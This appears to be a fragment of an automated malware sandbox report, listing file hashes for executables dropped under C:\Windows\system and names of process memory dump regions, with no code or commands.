SHA512 e3708ca046e5b446c7ddfbffcc6efa28d15411b3de4bc116feb0ae9c90d9207bf264bd3c65fff54253ed3351556e414ea7d06eac03310ed403d57600c46b44aa

C:\Windows\system\AJPwSyP.exe

MD5 b4f6b4347a4257382395e7fcc7bcf082
SHA1 29e9faa7c7a8e76c1da0887cc7d4bca4ebc6dc61
SHA256 77a4835e47bca5088e07c0474fd979996b9a3b025bf8ef3733c9b80267a17e6b
SHA512 e1531f8149e5c39368b70fba09351f7bf69a35df5f3901e56de127b1bf7f78e93d629317699eec46667e1058fd665e567d68a5a0b018e3eab432001d4550fc37

memory/2408-38-0x000007FEF555E000-0x000007FEF555F000-memory.dmp

memory/2408-37-0x0000000002BA0000-0x0000000002C20000-memory.dmp

memory/2244-29-0x000000013F600000-0x000000013F9F2000-memory.dmp

memory/2252-14-0x000000013F5C0000-0x000000013F9B2000-memory.dmp

memory/2244-12-0x000000013F440000-0x000000013F832000-memory.dmp

C:\Windows\system\DvHVYHX.exe

MD5 ef758e56e906b9892f08e5e0fd0f13b2
SHA1 5d91983aa1bb61c5754ee9a01242f0bb098e7d43
SHA256 55949f339b372645d839eaa0847f4e244396f7e39c4586ddc776fb793deda110
SHA512 efd8bb7ef71cf583c97f5d0eac4e2fae239c80d85643b80c586971498ace127bb0c9565e46052e55211bb3dead5ae54145b84fc68e9ff4a6be2a5f6b0f086760

memory/2252-4913-0x000000013F5C0000-0x000000013F9B2000-memory.dmp

memory/2148-4911-0x000000013F600000-0x000000013F9F2000-memory.dmp

memory/2812-5103-0x000000013FDB0000-0x00000001401A2000-memory.dmp

memory/2504-5110-0x000000013F420000-0x000000013F812000-memory.dmp

memory/2516-5108-0x000000013F6B0000-0x000000013FAA2000-memory.dmp

memory/2676-5101-0x000000013F780000-0x000000013FB72000-memory.dmp

memory/2580-5065-0x000000013F440000-0x000000013F832000-memory.dmp